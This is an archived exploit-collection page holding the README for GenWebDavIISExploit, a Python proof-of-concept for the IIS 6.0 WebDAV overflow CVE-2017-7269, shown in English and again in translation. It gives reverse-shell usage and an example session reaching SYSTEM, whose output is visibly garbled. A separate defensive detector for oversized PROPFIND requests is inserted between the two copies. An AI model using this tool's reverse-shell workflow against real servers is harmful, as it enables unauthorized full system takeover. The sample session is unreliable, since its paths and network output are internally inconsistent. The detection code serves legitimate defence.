PoC details: 31c22ff8c01d4a7bece118b6a366259159c31e47

Source
Related vulnerability
Title: Microsoft Internet Information Services buffer error vulnerability (CVE-2017-7269)
Description: Microsoft Windows Server 2003 R2 is a server operating system released by Microsoft. Internet Information Services (IIS) is a set of basic Internet services that run on Microsoft Windows. The 'ScStoragePathFromUrl' function of the WebDAV service in IIS 6.0 on Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability. A remote attacker can exploit it to execute arbitrary code by sending a specially crafted PROPFIND request.
Description
PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.
Introduction

# EN
**GenWebDavIISExploit** is a PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.

## Disclaimer

This project is intended for **educational purposes only**. Use this tool responsibly and only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## Features

- Remote code execution on vulnerable IIS6 WebDAV servers.
- Dynamic payload generation with user-specified reverse IP and port.
- Easy-to-use command-line interface for rapid exploitation.

## Prerequisites

- **Python 3.x**: Ensure that Python 3 is installed on your system.
- **Network Access**: Ability to connect to the target machine's IP and port.

## Usage
### Command-Line Arguments

- **Target IP**: The IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address where the reverse shell should connect.
- **Reverse Port**: The port number on your system to receive the reverse shell.

## Example

```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```

## Usage Example

```bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received a connection back from 192.168.1.10:12345
[+] Remote access successfully established!

C:Windows\Windows\system32> whoami
nt authority\system

C:\Windows/system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS-127.00.1 . . . . . . . : example.local
      IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
      Subnet mask . . . . . . . . . . . . . . . . : 255.255.255.0
      Main gateway . . . . . . . . . . . . . . . . : 192.168.1.1
    
```


## Notes
- Ensure you have a listener running on the specified reverse port to capture the incoming reverse shell.
- Use this tool only on authorized systems to test for vulnerabilities.
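From the defender's side, the request shape described above (a PROPFIND whose WebDAV URL-carrying headers are far longer than any client would send) is what public IDS signatures for CVE-2017-7269 inspect. The following is an added example, not part of GenWebDavIISExploit or the original README: it parses raw HTTP requests as a proxy or sensor would capture them and flags PROPFIND requests with oversized `If`/`Destination` headers or request targets. The 1024-byte threshold and the sample requests are assumptions and constructed test data.

```python
# Added detection example (not from the GenWebDavIISExploit project).
# Flags PROPFIND requests whose WebDAV URL-carrying headers are abnormally
# long, the traffic shape associated with CVE-2017-7269 attempts.
# The threshold is an assumption; tune it for your own WebDAV clients.
from typing import Dict, List, Tuple

MAX_LEN = 1024  # assumed threshold; legitimate WebDAV headers are far shorter
WATCHED_HEADERS = ("if", "destination")  # WebDAV headers that carry URL tokens


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request into (method, target, headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def suspicious_propfind(raw: bytes) -> List[str]:
    """Return the reasons a request looks anomalous; empty list means clean."""
    method, target, headers = parse_request(raw)
    reasons: List[str] = []
    if method.upper() != "PROPFIND":
        return reasons
    for name in WATCHED_HEADERS:
        value = headers.get(name, "")
        if len(value) > MAX_LEN:
            reasons.append(f"{name} header is {len(value)} bytes")
    if len(target) > MAX_LEN:
        reasons.append(f"request target is {len(target)} bytes")
    return reasons


# Constructed sample traffic: a normal WebDAV client request and an anomalous one.
BENIGN = (b"PROPFIND /share/ HTTP/1.1\r\nHost: 192.168.1.10\r\nDepth: 1\r\n"
          b"If: <http://192.168.1.10/share/> (<opaquelocktoken:abc>)\r\n\r\n")
ANOMALOUS = (b"PROPFIND / HTTP/1.1\r\nHost: 192.168.1.10\r\n"
             b"If: <http://192.168.1.10/" + b"A" * 2000 + b">\r\n\r\n")
PLAIN_GET = b"GET /index.html HTTP/1.1\r\nHost: 192.168.1.10\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("anomalous", ANOMALOUS), ("get", PLAIN_GET)):
        print(label, suspicious_propfind(req) or "ok")
```

Run against a capture of WebDAV traffic, a non-empty result on a server still answering with `Server: Microsoft-IIS/6.0` is worth an incident ticket; the lasting fix is disabling WebDAV on IIS 6.0 or retiring the host.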


# RU
**GenWebDavIISExploit** is a PoC tool that demonstrates exploitation of a known vulnerability in the WebDAV component on IIS6. This tool is created for educational and research purposes to show how the vulnerability can be exploited to execute arbitrary code on a remote server.



## Disclaimer

This project is intended **for educational purposes only**. Use this tool responsibly and only on systems that you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## Features

- Execution of remote code on vulnerable IIS6 WebDAV servers.
- Dynamic payload code generation with IP and port specification for the reverse connection.
- Simple command line interface for quick use.

## Requirements

- **Python 3.x**: Make sure you have Python 3 installed.
- **Network Access**: Ability to connect to the target machine's IP address and port.


## Usage

### Command line arguments

- **Target IP**: IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address to which the reverse connection should be established.
- **Reverse Port**: The port number on your system to receive the reverse connection.

## Example

```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```

## Example usage

```bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received back connection from 192.168.1.10:12345
[+] Remote access successfully established!

C:Windows\Windows\system32> whoami
nt authority\system

C:\Windows/system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS connection suffix . . . . . . . : example.local
      IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
      Subnet Mask . . . . . . . . . . . . . . . : 255.255.255.0
      Default Gateway . . . . . . . . . . . . . . . . : 192.168.1.1
    
```


## Notes

- Make sure you have a listener running on the specified reverse port to intercept the incoming reverse connection.
- Use this tool only on authorized systems to check for vulnerabilities.
File snapshot

```
[4.0K] /data/pocs/31c22ff8c01d4a7bece118b6a366259159c31e47
├── [ 15K] GenWebDavIISExploit.py
├── [1.0K] LICENSE
└── [5.2K] README.md

0 directories, 3 files
```
Cached for you by the Shenlong bot
Notes
    1. It is recommended to access the PoC through the source link first.
    2. If the source has disappeared or cannot be reached, e-mail f.jinxu#gmail.com (replace # with @) to request the local snapshot.
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.